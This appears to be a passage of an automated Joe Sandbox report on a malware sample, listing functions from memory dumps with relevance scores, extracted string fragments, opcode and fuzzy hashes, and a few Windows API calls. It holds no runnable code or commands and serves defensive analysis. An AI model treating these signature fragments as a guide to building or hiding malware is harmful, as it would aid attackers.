                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                    • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                    • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                    • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                                    Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                    • API String ID: 0-119712241
                                                                                                                                                                                                                                                                    • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                    • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                    Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                                    • API String ID: 0-2430453506
                                                                                                                                                                                                                                                                    • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                    • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                                    Function 024BC8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                    • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                    • Instruction ID: 71bcb16d34c2afef8497121d6b07e83acbbc8df18cf3bd58003839770b83cb46
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0B1D57510C3818EE369CF29C4D07ABBBD2AFD6314F188A6ED4D98B391DB748549C722
                                                                                                                                                                                                                                                                    Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                    • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                    • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                    Function 024989F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 02498A1B
                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02498A25
                                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02498AC2
                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 02498AD7
                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 02498BD9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                    • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                    • Instruction ID: 3c22db29e3041e4883b340d1e0098570924b4724292bdb834f920f83e432cf9b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6417C77F4431807D71CAEB9DC9936AB69B9BC4314F0E803F6985AB390DE795C0696C0
                                                                                                                                                                                                                                                                    Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                                    • API String ID: 0-1001561910
                                                                                                                                                                                                                                                                    • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                    • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                                    Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                                    • API String ID: 0-3020956940
                                                                                                                                                                                                                                                                    • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                    • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                                    Function 024B0817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                    • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                    • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                    • Instruction ID: 069069d79d43cb6cf4bea0452027827898fb68567307262ae85d267941b464e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AD117B56083018BD724DF25C8527ABB7F2EF92319F18996DE4828F3A4F7799401CB52
                                                                                                                                                                                                                                                                    Function 024BC94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                    • Instruction ID: f301dbb6ca1db81a006255d0263494cc57243c56ef61b29d79540b35bb951c58
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66A1D77510C3818EE365CF29C4D07ABBBD2AFD6304F188A6ED4D98B391DB748449C766
                                                                                                                                                                                                                                                                    Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                    • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                                    Function 024BC99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                    • Instruction ID: 362284b3f6d56a0dbaff5ada9fcfbcea297e515e5218d39ffbb8955a1c9c2a62
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FA1D77410C3818EE365CF29C4D07ABBBD2AFD6304F288A6ED4D98B391DB748549C766
                                                                                                                                                                                                                                                                    Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                    • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                    Function 024BC98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                    • Instruction ID: e34893e954f569520b003ed65eb6b2666269d71f9a66198bcfee89c3a565cd48
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CA1E67410C3818ED325CF29C4D07EBBBD6AFD2304F288A6ED4D98B291DB748449C762
                                                                                                                                                                                                                                                                    Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                    • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                                    Function 00415298 Relevance: 6.1, Strings: 4, Instructions: 1123COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                    • API String ID: 0-979945983
                                                                                                                                                                                                                                                                    • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                    • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                                    Function 024AE1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                    • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                    • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                    • Instruction ID: 5d87d7fef0fa45d6488f4942b86123d8a35a87a65476da76f2ddf5fbed33f6bb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E742177060C3908FD725DF28C86076FBBE1AFA6214F08867EE8E55B392D7358506CB52
                                                                                                                                                                                                                                                                    Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                    • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                    • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                    • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                                    Function 024BB75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                    • API String ID: 0-261129489
                                                                                                                                                                                                                                                                    • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                    • Instruction ID: 899687713e310fbb8661edb96a8ced5ba804bd98088320c005652a9a3bbfd9fe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0E1F87111D3C18AE765CF29C4517FBBBD6EF92208F18896EC4D987392DB39810AC722
                                                                                                                                                                                                                                                                    Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %(#}$/$/26-$1
